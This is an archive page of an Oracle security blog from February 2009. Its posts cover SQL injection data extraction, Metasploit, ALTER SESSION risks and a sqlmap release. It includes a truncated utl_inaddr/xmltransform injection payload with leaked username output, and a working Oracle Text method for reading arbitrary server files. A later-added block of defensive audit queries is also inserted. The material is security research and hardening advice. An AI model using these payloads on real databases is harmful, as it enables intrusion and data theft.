You are currently in the archives of the blog Alexander Kornbrust Oracle Security Blog for February 2009.
Archive for February 2009
New SQL Injection Whitepaper (for SQL Server)
8 Feb 2009 by Alexander Kornbrust.
Daniel Kachakil released an interesting whitepaper about fast data extraction using SQL Injection and XML statements on SQL Server, together with a tool implementing this technique called SFX-SQLI.
The paper describes how to retrieve data from a SQL Server database using SQL Injection and XML. This technique is not new (for me). I have been using such techniques in the Oracle environment via xmltransform or stragg for a while. It is possible to retrieve the entire content of a table in a single error message…
More details will be available in the SQL Injection book I am currently writing with some other security researchers…
The tool SFX-SQLI implements the concept for SQL Server.
Here is one of the examples of how to export an entire table, e.g. via utl_inaddr. The output is limited to 4000 bytes:
or 1= utl_inaddr.get_host_name((select xmltransform(sys_xmlagg(sys_xmlgen(username)),xmltype('<?xml version="1.0"?>
Warning: ociexecute(): OCIStmtExecute: ORA-29257: host CUSTCOM_PROD;WEBTOOL;WEBDB;NELLDB;ERDB;B2B;BI;PM;SH;IX;OE;HR;SCOTT;MGMT_VIEW;MDDATA;SYSMAN;MDSYS;SI_INFORMTN_SCHEMA;ORDPLUGINS;ORDSYS;OLAPSYS;ANONYMOUS;XDB;CTXSYS;EXFSYS;WMSYS;DBSNMP;TSMSYS;DIP;OUTLN;SYSTEM;SYS; unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35
Posted in Exploit, SQL Injection | No comments
Attacking Oracle with Metasploit Video published
7 Feb 2009 by Alexander Kornbrust.
Chris Gates has published a video where he shows how to attack Oracle with Metasploit from the Shmoocon 09 conference.
Even though the attacks were shown on an outdated version of Oracle (10.1.0.3), it's good to see that the Oracle support in Metasploit is getting better…
Chris has an interesting blog called carnal0wnage.blogspot.com.
Posted in Exploit, SQL Injection | No comments
What is more dangerous? ALTER SESSION or OS Access?
7 Feb 2009 by Alexander Kornbrust.
Yesterday Pete Finnigan posted an entry "Is it possible to steal data with just ALTER SESSION?" in his blog.
In this blog entry Pete describes various interesting possibilities to dump sensitive information from the database via ALTER SESSION, e.g. the library cache, password hashes, …
It's clear that "alter session" offers many methods to dump data to the file system of the database server, but without access to the (trace) file this information would be useless.
Pete also talked about the methods of getting such a trace file from the database server. According to Pete, "a lot of" databases where he performed a security audit had utl_file_dir=* set or directory objects pointing to the trace files.
It would be interesting to know from Pete's experience on how many production systems a user with "alter session" can access the trace file without asking the DBA for additional privileges, especially since "alter session" was removed from the CONNECT role in 10g R2. 50%? 20%? 10%? 1%?
I have audited several hundred Oracle databases and so far only 5 of them had UTL_FILE_DIR=*. In my experience that is something less than 1%, at least far away from "a lot". But our customer base probably has a different kind of database setup.
To steal the data from the server it is necessary to have the privilege ALTER SESSION plus the right to get data from the file system.
The question is: what is more dangerous, file access from the database or the ALTER SESSION privilege? It is clear that the best solution is to restrict/block both, but this is not always possible.
I would vote for restricting/blocking file access because this will close many potential security holes. ALTER SESSION is only one problem.
A database with the setting UTL_FILE_DIR=* (by the way, utl_file_dir has been deprecated by Oracle since 9.2) has bigger problems than ALTER SESSION.
The important point in this discussion is to know all the different ways a database user can access the file system of the database server. From my experience, most DBAs do not know all the documented ways this can be done.
I know 3 documented concepts in Oracle for accessing the file system from the database:
* UTL_FILE_DIR / Directory Concept
* Java
* Oracle Text
Using these techniques (e.g. UTL_FILE_DIR=*, Java or Oracle Text) a database user can read any file (e.g. .bash_history, the Oracle password file, data_sources.xml) from the server.
UTL_FILE_DIR / ORACLE DIRECTORY / CREATE ANY DIRECTORY:
This setting / Oracle object / privilege is required to access files. The file access can be done via packages (e.g. dbms_lob, utl_file, dbms_advisor, …), external tables or via a simple SQL statement (XMLTYPE). XMLTYPE in particular is dangerous because it is exploitable from a vulnerable web application without using packages. An example of how to do this can be found on my overview page Oracle SQL Injection via Web.
JAVA:
Special Java privileges are needed to read files from the operating system. These are not granted to PUBLIC. A sample of how this can be done is available here.
ORACLE TEXT:
Most DBAs are not aware of the possibility to read files via Oracle Text. By using the CTXAPP privilege plus CREATE TABLE it is possible to read files from any directory of the database server.
-- create a table
CREATE TABLE files (
  id        NUMBER PRIMARY KEY,
  path      VARCHAR(255) UNIQUE,
  ot_format VARCHAR(6)
);
-- insert the file (or URL!) you want to read into the table
INSERT INTO files VALUES (1, 'c:\boot.ini', NULL);
-- read the file/URL by creating an Oracle Text index
CREATE INDEX file_index ON files(path) INDEXTYPE IS ctxsys.context
  PARAMETERS ('datastore ctxsys.file_datastore format column ot_format');
-- retrieve the read data from the fulltext index
SELECT token_text FROM dr$file_index$i;
Sample Output
TOKEN_TEXT
----------------------------------------------------------------
0
1
30
Microsoft
Professional
WINDOWS
Windows
XP
boot
default
disk
Conclusion:
To harden a database there are many steps to perform. Blocking file and OS access is one of the most important. That's why it is necessary for a DBA, and also for a security researcher, to know all the ways this can be done.
The Oracle database is a huge product. If you know additional documented/undocumented ways to access files, do not hesitate to send me an email or to post a comment.
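As an added check (not part of the original post and not the author's code), the following audit queries enumerate the settings and grants behind each of the three file-access paths listed above, plus direct ALTER SESSION grants; they assume a DBA-privileged session and use only the standard V$PARAMETER and DBA_* views.

```sql
-- Added audit script, not from the blog post. Run as a DBA-privileged user.

-- 1. UTL_FILE_DIR: any value deserves review, '*' is the worst case.
SELECT name, value,
       CASE WHEN value = '*'        THEN 'CRITICAL: unrestricted file access'
            WHEN value IS NOT NULL  THEN 'WARNING: review listed paths'
            ELSE 'ok' END AS finding
FROM   v$parameter
WHERE  name = 'utl_file_dir';

-- 2. Directory objects and who may READ/WRITE through them; a directory
--    pointing at the trace area is the case the post discusses.
SELECT d.directory_name, d.directory_path, p.grantee, p.privilege
FROM   dba_directories d
       LEFT JOIN dba_tab_privs p
              ON p.owner = d.owner AND p.table_name = d.directory_name
ORDER  BY d.directory_name, p.grantee;

-- 3. CREATE ANY DIRECTORY lets a user point a directory object at any path.
SELECT grantee, admin_option
FROM   dba_sys_privs
WHERE  privilege = 'CREATE ANY DIRECTORY';

-- 4. Java file permissions granted inside the database (the Java path).
SELECT grantee, name AS path, action, enabled
FROM   dba_java_policy
WHERE  type_name = 'java.io.FilePermission'
  AND  kind = 'GRANT'
ORDER  BY grantee;

-- 5. CTXAPP holders: with CREATE TABLE they can use the Oracle Text
--    file_datastore method shown above. CTXSYS/SYS are excluded as expected.
SELECT grantee
FROM   dba_role_privs
WHERE  granted_role = 'CTXAPP'
  AND  grantee NOT IN ('CTXSYS', 'SYS');

-- 6. Direct ALTER SESSION grants (not part of CONNECT since 10g R2).
SELECT grantee
FROM   dba_sys_privs
WHERE  privilege = 'ALTER SESSION'
ORDER  BY grantee;
```

Any non-empty result from queries 1 to 5 is a user who can turn a trace file written via ALTER SESSION into readable data, which is the combination the post argues is the real risk.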
Posted in Oracle Security | 1 comment
sqlmap 0.6.4.1 released
5 Feb 2009 by Alexander Kornbrust.
Yesterday Bernardo Damele released version 0.6.4.1 of the automatic SQL injection tool sqlmap. sqlmap supports all databases (including Oracle) and can automatically exploit SQL injection vulnerabilities and enumerate database information like usernames, privileges, … or download table content.
The latest changes are available in the changelog.
Here are 2 screenshots from a vulnerable test application (with Oracle 11g).
I also tried to run sqlmap 0.6.4.1 against my test server, but this version was not able to find the SQL injection.
Update:
Today Bernardo sent me an email saying that he will release an updated version of sqlmap within the next few weeks.
Posted in Oracle Security | No comments